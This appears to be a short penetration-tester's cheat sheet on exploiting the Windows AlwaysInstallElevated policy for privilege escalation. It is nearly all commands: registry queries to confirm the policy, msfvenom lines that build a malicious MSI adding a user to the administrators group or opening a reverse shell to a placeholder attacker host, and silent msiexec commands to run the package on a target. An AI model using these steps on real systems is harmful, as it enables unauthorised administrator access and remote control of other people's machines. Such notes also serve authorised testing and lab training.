Hack$Notes
Search
K

Always Install Elevated

Always Install Elevated

Check with:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
From the output, notice that "AlwaysInstallElevated" value is 1. This needs to be on both to be exploited.

Steps:

# Generate payload to add user to admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
OR
# Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi
# Run it on the target machine:
msiexec /quiet /qn /i setup.msi
msiexec /quiet /qn /i reverse.msi <--- Needs a netcat listener